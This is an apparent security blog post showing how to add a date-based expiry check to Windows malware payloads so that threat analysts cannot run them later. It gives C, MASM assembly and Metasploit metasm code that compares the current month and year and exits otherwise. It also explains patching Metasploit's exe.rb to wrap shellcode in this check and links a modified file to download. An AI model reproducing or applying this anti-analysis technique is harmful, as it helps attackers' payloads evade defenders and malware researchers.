\n
![\"\"](\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2018\/01\/rage.gif\")
<\/a><\/p>\nWhat’s something that would be super annoying as a threat analyst? What if you had a piece of malware that only worked temporarily? Regardless of if the C&C is up, most malware works out of the box. Let’s change that! Let’s make our payloads expire!<\/p>\n
What is needed? A few simple API calls, some assembly, some ruby, and some time.<\/p>\n
First we make it in C…<\/p>\n
<\/p>\n
#include <windows.h><\/span>\r\nWORD month = 12<\/span>;\r\nWORD year = 2017<\/span>;\r\n\r\nint<\/span> main(void<\/span>)\r\n{\r\n SYSTEMTIME lt;\r\n GetLocalTime(<);\r\n\tif<\/span>(month == lt.wMonth && year == lt.wYear)\r\n\t{\r\n\t\tFatalAppExit(0<\/span>,"cock!"<\/span>);\r\n\t}\r\n\telse<\/span>\r\n\t{\r\n\t\t__asm<\/span>\r\n\t\t{\r\n\t\t\tpush 0<\/span>\r\n\t\t\tCall ExitProcess\r\n\t\t}\r\n\t}\r\n}\r\n<\/pre>\n<\/div>\nThen we pull the assembly out with IDA…
\n![\"\"](\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2018\/01\/expire_assembly.png\")
<\/a><\/p>\nGreat, nice and easy. Except for the 2 WORD values placed in the AX register. These are from a data section. We need to put this into an assembly project and make it position independent. Why? Because screw read only memory, that’s why. That means allocate a chunk of memory dynamically and assign it to our SYSTIME structure which is 16 bytes in size. <\/p>\n
<\/p>\n
\n .486\r\n .model flat, stdcall\r\n option casemap :none\r\n include c:\\<\/span>masm32\\<\/span>include\\<\/span>windows.inc\r\n include c:\\<\/span>masm32\\<\/span>include\\<\/span>kernel32.inc\r\n\t include c:\\<\/span>masm32\\<\/span>include\\<\/span>user32.inc\r\n includelib c:\\<\/span>masm32\\<\/span>lib\\<\/span>kernel32.lib\r\n\t includelib c:\\<\/span>masm32\\<\/span>lib\\<\/span>user32.lib\r\n\r\n;SYSTEMTIME STRUCT<\/span>\r\n;\twYear WORD ?<\/span>\r\n;\twMonth WORD ?<\/span>\r\n;\twDayOfWeek WORD ?<\/span>\r\n;\twDay WORD ?<\/span>\r\n;\twHour WORD ?<\/span>\r\n;\twMinute WORD ?<\/span>\r\n;\twSecond WORD ?<\/span>\r\n;\twMilliseconds WORD ?<\/span>\r\n;SYSTEMTIME ENDS ; 16 bytes<\/span>\r\n; first 2 words are checked<\/span>\r\n; we dont need a data section<\/span>\r\n\r\n; .data<\/span>\r\n; DAY = 0Eh<\/span>\r\n; MONTH = 0Ch<\/span>\r\n; YEAR = 7E1h<\/span>\r\n \r\n .code\r\n;sysTime SYSTEMTIME <><\/span>\r\nstart:\r\n\r\n; lets figure out how to do this with PIC<\/span>\r\n; is now PIC<\/span>\r\n\r\npush ebp\r\nmov ebp, esp\r\n;sub esp, 10h<\/span>\r\npush 40h<\/span> ; PAGE_EXECUTE_READWRITE<\/span>\r\npush 1000h<\/span> ; MEM_COMMIT<\/span>\r\npush 10h<\/span> ; 16 bytes needed<\/span>\r\npush 0h<\/span> ; NULL as we dont care where the allocation is.<\/span>\r\ncall VirtualAlloc\r\nmov ebx, eax ; Store allocated address in ebx<\/span>\r\nlea eax, [ebx]\r\npush eax \r\ncall GetLocalTime\r\nmov ax, 0Ch<\/span> ; MONTH<\/span>\r\ncmp ax, [ebx+2<\/span>]\r\njnz short exitpart\r\nmov ax, 7E1h<\/span> ; YEAR<\/span>\r\ncmp ax, [ebx]\r\njz short continue\r\n\r\nexitpart:\r\npush 0<\/span>\r\ncall ExitProcess\r\n\r\ncontinue:\r\npush 0<\/span>\r\npush 65706f6eh<\/span>\r\ncall FatalAppExitA\r\n; shellcode start<\/span>\r\nend start\r\n<\/pre>\n<\/div>\nNow we have our assembly code, small and sexy like. Compile it with masm, its like less than a KB. So now, how to we implement this into metasploit? All payloads are processed and wrapped via this class \/lib\/msf\/util\/exe.rb<\/a>. <\/p>\nAt line 1632<\/a>, we have the master code bit responsible for allocating a read\/write\/executable block of memory and copying the shellcode inside.
\n![\"\"](\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2018\/01\/line1632.png\")
<\/a>
\nTo ensure our expiration code is hit BEFORE the shellcode is run, we should place our code just before memory is allocated for the shellcode. This is done at line 1767<\/a>.
\n![\"\"](\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2018\/01\/line1767.png\")
<\/a> <\/p>\nIn order to make our alterations, we need to make use of ‘metasm’, metasploit’s crazy assembler. Thankfully its intel-like in syntax. Analysis of the source shows you can’t just ‘call’ api’s like normal. Instead you have to push a special hash onto the stack, then call the ‘ebp’ register. How do we get said hashes? There exists a special python script in \/external\/source\/shellcode\/windows\/x86\/src\/hash.py<\/a> for obtaining these hashes. We need 1 hash in particular, the one for GetLocalTRime<\/a>. <\/p>\n![\"\"](\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2018\/01\/Untitled-1024x593.png\")
<\/a>
\nThe output is 0xD92CE33e. Here’s our addition to the exe.rb file:<\/p>\n<\/p>\n
\n;========================================\t\r\n; need chunk of memory for<\/span> SYSTIME struct\r\npush 40<\/span>h \t\t; PAGE_EXECUTE_READWRITE\r\npush 1000<\/span>h \t; MEM_COMMIT\r\npush 10<\/span>h \t; 16<\/span> bytes needed\r\npush 0<\/span>h \t\t; NULL as we dont care where the allocation is.\r\npush 0xE553A458<\/span> \t; hash( "kernel32.dll"<\/span>, "VirtualAlloc"<\/span> )\r\ncall ebp \t; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );\r\nmov ebx, eax \t; Store allocated address in<\/span> ebx\r\nlea eax, [ebx]\r\npush eax \r\npush 0xD92CE33e<\/span>\t\t \t; GetLocalTime with chunk from VirtualAlloc\r\ncall ebp \r\nmov ax,cx\r\n; curtime = Time.new\r\nmov cx, 0<\/span>x#{curtime.month.to_s(16)} ; MONTH converted to hex<\/span>\r\ncmp cx, [ebx+2<\/span>]\r\njnz short exitpart\r\nmov cx, 0<\/span>x#{curtime.year.to_s(16)} ; YEAR converted to hex<\/span>\r\ncmp cx, [ebx]\r\njz short wegood\r\nexitpart<\/span>:\r\n\t push 0<\/span>\r\n\t push 0x56A2B5F0<\/span>\r\n\t call ebp\t\t\t; ExitProcess\r\n\r\nwegood<\/span>:\r\n; passed checks, can start shellcode now\r\n;=====================================\t\r\n<\/pre>\n<\/div>\nNice eh? We grab the current month and year via ruby code and format it to hex.<\/p>\n
Does it work though? Does the pope shit in the woods? It’s January 2018 and the code works!
\n![\"\"](\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2018\/01\/launch.png\")
<\/a><\/p>\nI’ve made this work by creating a duplicate function (method?) of ‘win32_rwx_exec’ in the exe.rb. My idea would be initialization dependent upon an option. That would mean adding the option to Line 19 of lib\\msf\\core\\exploit\\exe.rb<\/a>
\n<\/p>\n\n\tif<\/span> opts[:expire<\/span>]\r\n\t payload = win32_rwx_exec_expire(code)\r\n\tend<\/span>\r\n<\/pre>\n<\/div>\nAll that’s left to do now is submit to MSF and see if they take it \/ import it. If you would like to play with it, download the ‘exe.rb’ file here and place it in your [INSTALL_DIR]\/lib\/msf\/util\/<\/i> folder. Download it here<\/a>.<\/p>\nI know this may upset a few of you, being just on Windows, but I got your back on part 2. Stay tuned for part 2 when I tackle the Linux addition to my metasploit addition. <\/p>\n